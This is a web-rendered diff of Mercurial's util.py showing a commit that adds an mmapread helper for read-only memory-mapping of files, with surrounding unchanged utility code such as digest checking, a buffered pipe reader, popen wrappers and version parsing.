##// END OF EJS Templates
util: add an mmapread method...
Mark Thomas -
r34296:3bb2a9f2 default
parent child Browse files
Show More
@@ -1,3769 +1,3781
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import calendar
20 import calendar
21 import codecs
21 import codecs
22 import collections
22 import collections
23 import contextlib
23 import contextlib
24 import datetime
24 import datetime
25 import errno
25 import errno
26 import gc
26 import gc
27 import hashlib
27 import hashlib
28 import imp
28 import imp
29 import mmap
29 import os
30 import os
30 import platform as pyplatform
31 import platform as pyplatform
31 import re as remod
32 import re as remod
32 import shutil
33 import shutil
33 import signal
34 import signal
34 import socket
35 import socket
35 import stat
36 import stat
36 import string
37 import string
37 import subprocess
38 import subprocess
38 import sys
39 import sys
39 import tempfile
40 import tempfile
40 import textwrap
41 import textwrap
41 import time
42 import time
42 import traceback
43 import traceback
43 import warnings
44 import warnings
44 import zlib
45 import zlib
45
46
46 from . import (
47 from . import (
47 encoding,
48 encoding,
48 error,
49 error,
49 i18n,
50 i18n,
50 policy,
51 policy,
51 pycompat,
52 pycompat,
52 )
53 )
53
54
54 base85 = policy.importmod(r'base85')
55 base85 = policy.importmod(r'base85')
55 osutil = policy.importmod(r'osutil')
56 osutil = policy.importmod(r'osutil')
56 parsers = policy.importmod(r'parsers')
57 parsers = policy.importmod(r'parsers')
57
58
58 b85decode = base85.b85decode
59 b85decode = base85.b85decode
59 b85encode = base85.b85encode
60 b85encode = base85.b85encode
60
61
61 cookielib = pycompat.cookielib
62 cookielib = pycompat.cookielib
62 empty = pycompat.empty
63 empty = pycompat.empty
63 httplib = pycompat.httplib
64 httplib = pycompat.httplib
64 httpserver = pycompat.httpserver
65 httpserver = pycompat.httpserver
65 pickle = pycompat.pickle
66 pickle = pycompat.pickle
66 queue = pycompat.queue
67 queue = pycompat.queue
67 socketserver = pycompat.socketserver
68 socketserver = pycompat.socketserver
68 stderr = pycompat.stderr
69 stderr = pycompat.stderr
69 stdin = pycompat.stdin
70 stdin = pycompat.stdin
70 stdout = pycompat.stdout
71 stdout = pycompat.stdout
71 stringio = pycompat.stringio
72 stringio = pycompat.stringio
72 urlerr = pycompat.urlerr
73 urlerr = pycompat.urlerr
73 urlreq = pycompat.urlreq
74 urlreq = pycompat.urlreq
74 xmlrpclib = pycompat.xmlrpclib
75 xmlrpclib = pycompat.xmlrpclib
75
76
76 # workaround for win32mbcs
77 # workaround for win32mbcs
77 _filenamebytestr = pycompat.bytestr
78 _filenamebytestr = pycompat.bytestr
78
79
79 def isatty(fp):
80 def isatty(fp):
80 try:
81 try:
81 return fp.isatty()
82 return fp.isatty()
82 except AttributeError:
83 except AttributeError:
83 return False
84 return False
84
85
85 # glibc determines buffering on first write to stdout - if we replace a TTY
86 # glibc determines buffering on first write to stdout - if we replace a TTY
86 # destined stdout with a pipe destined stdout (e.g. pager), we want line
87 # destined stdout with a pipe destined stdout (e.g. pager), we want line
87 # buffering
88 # buffering
88 if isatty(stdout):
89 if isatty(stdout):
89 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
90 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
90
91
91 if pycompat.osname == 'nt':
92 if pycompat.osname == 'nt':
92 from . import windows as platform
93 from . import windows as platform
93 stdout = platform.winstdout(stdout)
94 stdout = platform.winstdout(stdout)
94 else:
95 else:
95 from . import posix as platform
96 from . import posix as platform
96
97
97 _ = i18n._
98 _ = i18n._
98
99
99 bindunixsocket = platform.bindunixsocket
100 bindunixsocket = platform.bindunixsocket
100 cachestat = platform.cachestat
101 cachestat = platform.cachestat
101 checkexec = platform.checkexec
102 checkexec = platform.checkexec
102 checklink = platform.checklink
103 checklink = platform.checklink
103 copymode = platform.copymode
104 copymode = platform.copymode
104 executablepath = platform.executablepath
105 executablepath = platform.executablepath
105 expandglobs = platform.expandglobs
106 expandglobs = platform.expandglobs
106 explainexit = platform.explainexit
107 explainexit = platform.explainexit
107 findexe = platform.findexe
108 findexe = platform.findexe
108 gethgcmd = platform.gethgcmd
109 gethgcmd = platform.gethgcmd
109 getuser = platform.getuser
110 getuser = platform.getuser
110 getpid = os.getpid
111 getpid = os.getpid
111 groupmembers = platform.groupmembers
112 groupmembers = platform.groupmembers
112 groupname = platform.groupname
113 groupname = platform.groupname
113 hidewindow = platform.hidewindow
114 hidewindow = platform.hidewindow
114 isexec = platform.isexec
115 isexec = platform.isexec
115 isowner = platform.isowner
116 isowner = platform.isowner
116 listdir = osutil.listdir
117 listdir = osutil.listdir
117 localpath = platform.localpath
118 localpath = platform.localpath
118 lookupreg = platform.lookupreg
119 lookupreg = platform.lookupreg
119 makedir = platform.makedir
120 makedir = platform.makedir
120 nlinks = platform.nlinks
121 nlinks = platform.nlinks
121 normpath = platform.normpath
122 normpath = platform.normpath
122 normcase = platform.normcase
123 normcase = platform.normcase
123 normcasespec = platform.normcasespec
124 normcasespec = platform.normcasespec
124 normcasefallback = platform.normcasefallback
125 normcasefallback = platform.normcasefallback
125 openhardlinks = platform.openhardlinks
126 openhardlinks = platform.openhardlinks
126 oslink = platform.oslink
127 oslink = platform.oslink
127 parsepatchoutput = platform.parsepatchoutput
128 parsepatchoutput = platform.parsepatchoutput
128 pconvert = platform.pconvert
129 pconvert = platform.pconvert
129 poll = platform.poll
130 poll = platform.poll
130 popen = platform.popen
131 popen = platform.popen
131 posixfile = platform.posixfile
132 posixfile = platform.posixfile
132 quotecommand = platform.quotecommand
133 quotecommand = platform.quotecommand
133 readpipe = platform.readpipe
134 readpipe = platform.readpipe
134 rename = platform.rename
135 rename = platform.rename
135 removedirs = platform.removedirs
136 removedirs = platform.removedirs
136 samedevice = platform.samedevice
137 samedevice = platform.samedevice
137 samefile = platform.samefile
138 samefile = platform.samefile
138 samestat = platform.samestat
139 samestat = platform.samestat
139 setbinary = platform.setbinary
140 setbinary = platform.setbinary
140 setflags = platform.setflags
141 setflags = platform.setflags
141 setsignalhandler = platform.setsignalhandler
142 setsignalhandler = platform.setsignalhandler
142 shellquote = platform.shellquote
143 shellquote = platform.shellquote
143 spawndetached = platform.spawndetached
144 spawndetached = platform.spawndetached
144 split = platform.split
145 split = platform.split
145 sshargs = platform.sshargs
146 sshargs = platform.sshargs
146 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
147 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
147 statisexec = platform.statisexec
148 statisexec = platform.statisexec
148 statislink = platform.statislink
149 statislink = platform.statislink
149 testpid = platform.testpid
150 testpid = platform.testpid
150 umask = platform.umask
151 umask = platform.umask
151 unlink = platform.unlink
152 unlink = platform.unlink
152 username = platform.username
153 username = platform.username
153
154
154 try:
155 try:
155 recvfds = osutil.recvfds
156 recvfds = osutil.recvfds
156 except AttributeError:
157 except AttributeError:
157 pass
158 pass
158 try:
159 try:
159 setprocname = osutil.setprocname
160 setprocname = osutil.setprocname
160 except AttributeError:
161 except AttributeError:
161 pass
162 pass
162
163
163 # Python compatibility
164 # Python compatibility
164
165
165 _notset = object()
166 _notset = object()
166
167
167 # disable Python's problematic floating point timestamps (issue4836)
168 # disable Python's problematic floating point timestamps (issue4836)
168 # (Python hypocritically says you shouldn't change this behavior in
169 # (Python hypocritically says you shouldn't change this behavior in
169 # libraries, and sure enough Mercurial is not a library.)
170 # libraries, and sure enough Mercurial is not a library.)
170 os.stat_float_times(False)
171 os.stat_float_times(False)
171
172
172 def safehasattr(thing, attr):
173 def safehasattr(thing, attr):
173 return getattr(thing, attr, _notset) is not _notset
174 return getattr(thing, attr, _notset) is not _notset
174
175
175 def bytesinput(fin, fout, *args, **kwargs):
176 def bytesinput(fin, fout, *args, **kwargs):
176 sin, sout = sys.stdin, sys.stdout
177 sin, sout = sys.stdin, sys.stdout
177 try:
178 try:
178 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
179 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
179 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
180 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
180 finally:
181 finally:
181 sys.stdin, sys.stdout = sin, sout
182 sys.stdin, sys.stdout = sin, sout
182
183
183 def bitsfrom(container):
184 def bitsfrom(container):
184 bits = 0
185 bits = 0
185 for bit in container:
186 for bit in container:
186 bits |= bit
187 bits |= bit
187 return bits
188 return bits
188
189
189 # python 2.6 still have deprecation warning enabled by default. We do not want
190 # python 2.6 still have deprecation warning enabled by default. We do not want
190 # to display anything to standard user so detect if we are running test and
191 # to display anything to standard user so detect if we are running test and
191 # only use python deprecation warning in this case.
192 # only use python deprecation warning in this case.
192 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
193 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
193 if _dowarn:
194 if _dowarn:
194 # explicitly unfilter our warning for python 2.7
195 # explicitly unfilter our warning for python 2.7
195 #
196 #
196 # The option of setting PYTHONWARNINGS in the test runner was investigated.
197 # The option of setting PYTHONWARNINGS in the test runner was investigated.
197 # However, module name set through PYTHONWARNINGS was exactly matched, so
198 # However, module name set through PYTHONWARNINGS was exactly matched, so
198 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
199 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
199 # makes the whole PYTHONWARNINGS thing useless for our usecase.
200 # makes the whole PYTHONWARNINGS thing useless for our usecase.
200 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
201 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
201 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
202 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
202 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
203 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
203
204
204 def nouideprecwarn(msg, version, stacklevel=1):
205 def nouideprecwarn(msg, version, stacklevel=1):
205 """Issue an python native deprecation warning
206 """Issue an python native deprecation warning
206
207
207 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
208 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
208 """
209 """
209 if _dowarn:
210 if _dowarn:
210 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
211 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
211 " update your code.)") % version
212 " update your code.)") % version
212 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
213 warnings.warn(msg, DeprecationWarning, stacklevel + 1)
213
214
214 DIGESTS = {
215 DIGESTS = {
215 'md5': hashlib.md5,
216 'md5': hashlib.md5,
216 'sha1': hashlib.sha1,
217 'sha1': hashlib.sha1,
217 'sha512': hashlib.sha512,
218 'sha512': hashlib.sha512,
218 }
219 }
219 # List of digest types from strongest to weakest
220 # List of digest types from strongest to weakest
220 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
221 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
221
222
222 for k in DIGESTS_BY_STRENGTH:
223 for k in DIGESTS_BY_STRENGTH:
223 assert k in DIGESTS
224 assert k in DIGESTS
224
225
225 class digester(object):
226 class digester(object):
226 """helper to compute digests.
227 """helper to compute digests.
227
228
228 This helper can be used to compute one or more digests given their name.
229 This helper can be used to compute one or more digests given their name.
229
230
230 >>> d = digester([b'md5', b'sha1'])
231 >>> d = digester([b'md5', b'sha1'])
231 >>> d.update(b'foo')
232 >>> d.update(b'foo')
232 >>> [k for k in sorted(d)]
233 >>> [k for k in sorted(d)]
233 ['md5', 'sha1']
234 ['md5', 'sha1']
234 >>> d[b'md5']
235 >>> d[b'md5']
235 'acbd18db4cc2f85cedef654fccc4a4d8'
236 'acbd18db4cc2f85cedef654fccc4a4d8'
236 >>> d[b'sha1']
237 >>> d[b'sha1']
237 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
238 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
238 >>> digester.preferred([b'md5', b'sha1'])
239 >>> digester.preferred([b'md5', b'sha1'])
239 'sha1'
240 'sha1'
240 """
241 """
241
242
242 def __init__(self, digests, s=''):
243 def __init__(self, digests, s=''):
243 self._hashes = {}
244 self._hashes = {}
244 for k in digests:
245 for k in digests:
245 if k not in DIGESTS:
246 if k not in DIGESTS:
246 raise Abort(_('unknown digest type: %s') % k)
247 raise Abort(_('unknown digest type: %s') % k)
247 self._hashes[k] = DIGESTS[k]()
248 self._hashes[k] = DIGESTS[k]()
248 if s:
249 if s:
249 self.update(s)
250 self.update(s)
250
251
251 def update(self, data):
252 def update(self, data):
252 for h in self._hashes.values():
253 for h in self._hashes.values():
253 h.update(data)
254 h.update(data)
254
255
255 def __getitem__(self, key):
256 def __getitem__(self, key):
256 if key not in DIGESTS:
257 if key not in DIGESTS:
257 raise Abort(_('unknown digest type: %s') % k)
258 raise Abort(_('unknown digest type: %s') % k)
258 return self._hashes[key].hexdigest()
259 return self._hashes[key].hexdigest()
259
260
260 def __iter__(self):
261 def __iter__(self):
261 return iter(self._hashes)
262 return iter(self._hashes)
262
263
263 @staticmethod
264 @staticmethod
264 def preferred(supported):
265 def preferred(supported):
265 """returns the strongest digest type in both supported and DIGESTS."""
266 """returns the strongest digest type in both supported and DIGESTS."""
266
267
267 for k in DIGESTS_BY_STRENGTH:
268 for k in DIGESTS_BY_STRENGTH:
268 if k in supported:
269 if k in supported:
269 return k
270 return k
270 return None
271 return None
271
272
272 class digestchecker(object):
273 class digestchecker(object):
273 """file handle wrapper that additionally checks content against a given
274 """file handle wrapper that additionally checks content against a given
274 size and digests.
275 size and digests.
275
276
276 d = digestchecker(fh, size, {'md5': '...'})
277 d = digestchecker(fh, size, {'md5': '...'})
277
278
278 When multiple digests are given, all of them are validated.
279 When multiple digests are given, all of them are validated.
279 """
280 """
280
281
281 def __init__(self, fh, size, digests):
282 def __init__(self, fh, size, digests):
282 self._fh = fh
283 self._fh = fh
283 self._size = size
284 self._size = size
284 self._got = 0
285 self._got = 0
285 self._digests = dict(digests)
286 self._digests = dict(digests)
286 self._digester = digester(self._digests.keys())
287 self._digester = digester(self._digests.keys())
287
288
288 def read(self, length=-1):
289 def read(self, length=-1):
289 content = self._fh.read(length)
290 content = self._fh.read(length)
290 self._digester.update(content)
291 self._digester.update(content)
291 self._got += len(content)
292 self._got += len(content)
292 return content
293 return content
293
294
294 def validate(self):
295 def validate(self):
295 if self._size != self._got:
296 if self._size != self._got:
296 raise Abort(_('size mismatch: expected %d, got %d') %
297 raise Abort(_('size mismatch: expected %d, got %d') %
297 (self._size, self._got))
298 (self._size, self._got))
298 for k, v in self._digests.items():
299 for k, v in self._digests.items():
299 if v != self._digester[k]:
300 if v != self._digester[k]:
300 # i18n: first parameter is a digest name
301 # i18n: first parameter is a digest name
301 raise Abort(_('%s mismatch: expected %s, got %s') %
302 raise Abort(_('%s mismatch: expected %s, got %s') %
302 (k, v, self._digester[k]))
303 (k, v, self._digester[k]))
303
304
304 try:
305 try:
305 buffer = buffer
306 buffer = buffer
306 except NameError:
307 except NameError:
307 def buffer(sliceable, offset=0, length=None):
308 def buffer(sliceable, offset=0, length=None):
308 if length is not None:
309 if length is not None:
309 return memoryview(sliceable)[offset:offset + length]
310 return memoryview(sliceable)[offset:offset + length]
310 return memoryview(sliceable)[offset:]
311 return memoryview(sliceable)[offset:]
311
312
312 closefds = pycompat.osname == 'posix'
313 closefds = pycompat.osname == 'posix'
313
314
314 _chunksize = 4096
315 _chunksize = 4096
315
316
316 class bufferedinputpipe(object):
317 class bufferedinputpipe(object):
317 """a manually buffered input pipe
318 """a manually buffered input pipe
318
319
319 Python will not let us use buffered IO and lazy reading with 'polling' at
320 Python will not let us use buffered IO and lazy reading with 'polling' at
320 the same time. We cannot probe the buffer state and select will not detect
321 the same time. We cannot probe the buffer state and select will not detect
321 that data are ready to read if they are already buffered.
322 that data are ready to read if they are already buffered.
322
323
323 This class let us work around that by implementing its own buffering
324 This class let us work around that by implementing its own buffering
324 (allowing efficient readline) while offering a way to know if the buffer is
325 (allowing efficient readline) while offering a way to know if the buffer is
325 empty from the output (allowing collaboration of the buffer with polling).
326 empty from the output (allowing collaboration of the buffer with polling).
326
327
327 This class lives in the 'util' module because it makes use of the 'os'
328 This class lives in the 'util' module because it makes use of the 'os'
328 module from the python stdlib.
329 module from the python stdlib.
329 """
330 """
330
331
331 def __init__(self, input):
332 def __init__(self, input):
332 self._input = input
333 self._input = input
333 self._buffer = []
334 self._buffer = []
334 self._eof = False
335 self._eof = False
335 self._lenbuf = 0
336 self._lenbuf = 0
336
337
337 @property
338 @property
338 def hasbuffer(self):
339 def hasbuffer(self):
339 """True is any data is currently buffered
340 """True is any data is currently buffered
340
341
341 This will be used externally a pre-step for polling IO. If there is
342 This will be used externally a pre-step for polling IO. If there is
342 already data then no polling should be set in place."""
343 already data then no polling should be set in place."""
343 return bool(self._buffer)
344 return bool(self._buffer)
344
345
345 @property
346 @property
346 def closed(self):
347 def closed(self):
347 return self._input.closed
348 return self._input.closed
348
349
349 def fileno(self):
350 def fileno(self):
350 return self._input.fileno()
351 return self._input.fileno()
351
352
352 def close(self):
353 def close(self):
353 return self._input.close()
354 return self._input.close()
354
355
355 def read(self, size):
356 def read(self, size):
356 while (not self._eof) and (self._lenbuf < size):
357 while (not self._eof) and (self._lenbuf < size):
357 self._fillbuffer()
358 self._fillbuffer()
358 return self._frombuffer(size)
359 return self._frombuffer(size)
359
360
360 def readline(self, *args, **kwargs):
361 def readline(self, *args, **kwargs):
361 if 1 < len(self._buffer):
362 if 1 < len(self._buffer):
362 # this should not happen because both read and readline end with a
363 # this should not happen because both read and readline end with a
363 # _frombuffer call that collapse it.
364 # _frombuffer call that collapse it.
364 self._buffer = [''.join(self._buffer)]
365 self._buffer = [''.join(self._buffer)]
365 self._lenbuf = len(self._buffer[0])
366 self._lenbuf = len(self._buffer[0])
366 lfi = -1
367 lfi = -1
367 if self._buffer:
368 if self._buffer:
368 lfi = self._buffer[-1].find('\n')
369 lfi = self._buffer[-1].find('\n')
369 while (not self._eof) and lfi < 0:
370 while (not self._eof) and lfi < 0:
370 self._fillbuffer()
371 self._fillbuffer()
371 if self._buffer:
372 if self._buffer:
372 lfi = self._buffer[-1].find('\n')
373 lfi = self._buffer[-1].find('\n')
373 size = lfi + 1
374 size = lfi + 1
374 if lfi < 0: # end of file
375 if lfi < 0: # end of file
375 size = self._lenbuf
376 size = self._lenbuf
376 elif 1 < len(self._buffer):
377 elif 1 < len(self._buffer):
377 # we need to take previous chunks into account
378 # we need to take previous chunks into account
378 size += self._lenbuf - len(self._buffer[-1])
379 size += self._lenbuf - len(self._buffer[-1])
379 return self._frombuffer(size)
380 return self._frombuffer(size)
380
381
381 def _frombuffer(self, size):
382 def _frombuffer(self, size):
382 """return at most 'size' data from the buffer
383 """return at most 'size' data from the buffer
383
384
384 The data are removed from the buffer."""
385 The data are removed from the buffer."""
385 if size == 0 or not self._buffer:
386 if size == 0 or not self._buffer:
386 return ''
387 return ''
387 buf = self._buffer[0]
388 buf = self._buffer[0]
388 if 1 < len(self._buffer):
389 if 1 < len(self._buffer):
389 buf = ''.join(self._buffer)
390 buf = ''.join(self._buffer)
390
391
391 data = buf[:size]
392 data = buf[:size]
392 buf = buf[len(data):]
393 buf = buf[len(data):]
393 if buf:
394 if buf:
394 self._buffer = [buf]
395 self._buffer = [buf]
395 self._lenbuf = len(buf)
396 self._lenbuf = len(buf)
396 else:
397 else:
397 self._buffer = []
398 self._buffer = []
398 self._lenbuf = 0
399 self._lenbuf = 0
399 return data
400 return data
400
401
401 def _fillbuffer(self):
402 def _fillbuffer(self):
402 """read data to the buffer"""
403 """read data to the buffer"""
403 data = os.read(self._input.fileno(), _chunksize)
404 data = os.read(self._input.fileno(), _chunksize)
404 if not data:
405 if not data:
405 self._eof = True
406 self._eof = True
406 else:
407 else:
407 self._lenbuf += len(data)
408 self._lenbuf += len(data)
408 self._buffer.append(data)
409 self._buffer.append(data)
409
410
411 def mmapread(fp):
412 try:
413 fd = getattr(fp, 'fileno', lambda: fp)()
414 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
415 except ValueError:
416 # Empty files cannot be mmapped, but mmapread should still work. Check
417 # if the file is empty, and if so, return an empty buffer.
418 if os.fstat(fd).st_size == 0:
419 return ''
420 raise
421
410 def popen2(cmd, env=None, newlines=False):
422 def popen2(cmd, env=None, newlines=False):
411 # Setting bufsize to -1 lets the system decide the buffer size.
423 # Setting bufsize to -1 lets the system decide the buffer size.
412 # The default for bufsize is 0, meaning unbuffered. This leads to
424 # The default for bufsize is 0, meaning unbuffered. This leads to
413 # poor performance on Mac OS X: http://bugs.python.org/issue4194
425 # poor performance on Mac OS X: http://bugs.python.org/issue4194
414 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
426 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
415 close_fds=closefds,
427 close_fds=closefds,
416 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
428 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
417 universal_newlines=newlines,
429 universal_newlines=newlines,
418 env=env)
430 env=env)
419 return p.stdin, p.stdout
431 return p.stdin, p.stdout
420
432
421 def popen3(cmd, env=None, newlines=False):
433 def popen3(cmd, env=None, newlines=False):
422 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
434 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
423 return stdin, stdout, stderr
435 return stdin, stdout, stderr
424
436
425 def popen4(cmd, env=None, newlines=False, bufsize=-1):
437 def popen4(cmd, env=None, newlines=False, bufsize=-1):
426 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
438 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
427 close_fds=closefds,
439 close_fds=closefds,
428 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
440 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
429 stderr=subprocess.PIPE,
441 stderr=subprocess.PIPE,
430 universal_newlines=newlines,
442 universal_newlines=newlines,
431 env=env)
443 env=env)
432 return p.stdin, p.stdout, p.stderr, p
444 return p.stdin, p.stdout, p.stderr, p
433
445
434 def version():
446 def version():
435 """Return version information if available."""
447 """Return version information if available."""
436 try:
448 try:
437 from . import __version__
449 from . import __version__
438 return __version__.version
450 return __version__.version
439 except ImportError:
451 except ImportError:
440 return 'unknown'
452 return 'unknown'
441
453
442 def versiontuple(v=None, n=4):
454 def versiontuple(v=None, n=4):
443 """Parses a Mercurial version string into an N-tuple.
455 """Parses a Mercurial version string into an N-tuple.
444
456
445 The version string to be parsed is specified with the ``v`` argument.
457 The version string to be parsed is specified with the ``v`` argument.
446 If it isn't defined, the current Mercurial version string will be parsed.
458 If it isn't defined, the current Mercurial version string will be parsed.
447
459
448 ``n`` can be 2, 3, or 4. Here is how some version strings map to
460 ``n`` can be 2, 3, or 4. Here is how some version strings map to
449 returned values:
461 returned values:
450
462
451 >>> v = b'3.6.1+190-df9b73d2d444'
463 >>> v = b'3.6.1+190-df9b73d2d444'
452 >>> versiontuple(v, 2)
464 >>> versiontuple(v, 2)
453 (3, 6)
465 (3, 6)
454 >>> versiontuple(v, 3)
466 >>> versiontuple(v, 3)
455 (3, 6, 1)
467 (3, 6, 1)
456 >>> versiontuple(v, 4)
468 >>> versiontuple(v, 4)
457 (3, 6, 1, '190-df9b73d2d444')
469 (3, 6, 1, '190-df9b73d2d444')
458
470
459 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
471 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
460 (3, 6, 1, '190-df9b73d2d444+20151118')
472 (3, 6, 1, '190-df9b73d2d444+20151118')
461
473
462 >>> v = b'3.6'
474 >>> v = b'3.6'
463 >>> versiontuple(v, 2)
475 >>> versiontuple(v, 2)
464 (3, 6)
476 (3, 6)
465 >>> versiontuple(v, 3)
477 >>> versiontuple(v, 3)
466 (3, 6, None)
478 (3, 6, None)
467 >>> versiontuple(v, 4)
479 >>> versiontuple(v, 4)
468 (3, 6, None, None)
480 (3, 6, None, None)
469
481
470 >>> v = b'3.9-rc'
482 >>> v = b'3.9-rc'
471 >>> versiontuple(v, 2)
483 >>> versiontuple(v, 2)
472 (3, 9)
484 (3, 9)
473 >>> versiontuple(v, 3)
485 >>> versiontuple(v, 3)
474 (3, 9, None)
486 (3, 9, None)
475 >>> versiontuple(v, 4)
487 >>> versiontuple(v, 4)
476 (3, 9, None, 'rc')
488 (3, 9, None, 'rc')
477
489
478 >>> v = b'3.9-rc+2-02a8fea4289b'
490 >>> v = b'3.9-rc+2-02a8fea4289b'
479 >>> versiontuple(v, 2)
491 >>> versiontuple(v, 2)
480 (3, 9)
492 (3, 9)
481 >>> versiontuple(v, 3)
493 >>> versiontuple(v, 3)
482 (3, 9, None)
494 (3, 9, None)
483 >>> versiontuple(v, 4)
495 >>> versiontuple(v, 4)
484 (3, 9, None, 'rc+2-02a8fea4289b')
496 (3, 9, None, 'rc+2-02a8fea4289b')
485 """
497 """
486 if not v:
498 if not v:
487 v = version()
499 v = version()
488 parts = remod.split('[\+-]', v, 1)
500 parts = remod.split('[\+-]', v, 1)
489 if len(parts) == 1:
501 if len(parts) == 1:
490 vparts, extra = parts[0], None
502 vparts, extra = parts[0], None
491 else:
503 else:
492 vparts, extra = parts
504 vparts, extra = parts
493
505
494 vints = []
506 vints = []
495 for i in vparts.split('.'):
507 for i in vparts.split('.'):
496 try:
508 try:
497 vints.append(int(i))
509 vints.append(int(i))
498 except ValueError:
510 except ValueError:
499 break
511 break
500 # (3, 6) -> (3, 6, None)
512 # (3, 6) -> (3, 6, None)
501 while len(vints) < 3:
513 while len(vints) < 3:
502 vints.append(None)
514 vints.append(None)
503
515
504 if n == 2:
516 if n == 2:
505 return (vints[0], vints[1])
517 return (vints[0], vints[1])
506 if n == 3:
518 if n == 3:
507 return (vints[0], vints[1], vints[2])
519 return (vints[0], vints[1], vints[2])
508 if n == 4:
520 if n == 4:
509 return (vints[0], vints[1], vints[2], extra)
521 return (vints[0], vints[1], vints[2], extra)
510
522
511 # used by parsedate
523 # used by parsedate
512 defaultdateformats = (
524 defaultdateformats = (
513 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
525 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
514 '%Y-%m-%dT%H:%M', # without seconds
526 '%Y-%m-%dT%H:%M', # without seconds
515 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
527 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
516 '%Y-%m-%dT%H%M', # without seconds
528 '%Y-%m-%dT%H%M', # without seconds
517 '%Y-%m-%d %H:%M:%S', # our common legal variant
529 '%Y-%m-%d %H:%M:%S', # our common legal variant
518 '%Y-%m-%d %H:%M', # without seconds
530 '%Y-%m-%d %H:%M', # without seconds
519 '%Y-%m-%d %H%M%S', # without :
531 '%Y-%m-%d %H%M%S', # without :
520 '%Y-%m-%d %H%M', # without seconds
532 '%Y-%m-%d %H%M', # without seconds
521 '%Y-%m-%d %I:%M:%S%p',
533 '%Y-%m-%d %I:%M:%S%p',
522 '%Y-%m-%d %H:%M',
534 '%Y-%m-%d %H:%M',
523 '%Y-%m-%d %I:%M%p',
535 '%Y-%m-%d %I:%M%p',
524 '%Y-%m-%d',
536 '%Y-%m-%d',
525 '%m-%d',
537 '%m-%d',
526 '%m/%d',
538 '%m/%d',
527 '%m/%d/%y',
539 '%m/%d/%y',
528 '%m/%d/%Y',
540 '%m/%d/%Y',
529 '%a %b %d %H:%M:%S %Y',
541 '%a %b %d %H:%M:%S %Y',
530 '%a %b %d %I:%M:%S%p %Y',
542 '%a %b %d %I:%M:%S%p %Y',
531 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
543 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
532 '%b %d %H:%M:%S %Y',
544 '%b %d %H:%M:%S %Y',
533 '%b %d %I:%M:%S%p %Y',
545 '%b %d %I:%M:%S%p %Y',
534 '%b %d %H:%M:%S',
546 '%b %d %H:%M:%S',
535 '%b %d %I:%M:%S%p',
547 '%b %d %I:%M:%S%p',
536 '%b %d %H:%M',
548 '%b %d %H:%M',
537 '%b %d %I:%M%p',
549 '%b %d %I:%M%p',
538 '%b %d %Y',
550 '%b %d %Y',
539 '%b %d',
551 '%b %d',
540 '%H:%M:%S',
552 '%H:%M:%S',
541 '%I:%M:%S%p',
553 '%I:%M:%S%p',
542 '%H:%M',
554 '%H:%M',
543 '%I:%M%p',
555 '%I:%M%p',
544 )
556 )
545
557
546 extendeddateformats = defaultdateformats + (
558 extendeddateformats = defaultdateformats + (
547 "%Y",
559 "%Y",
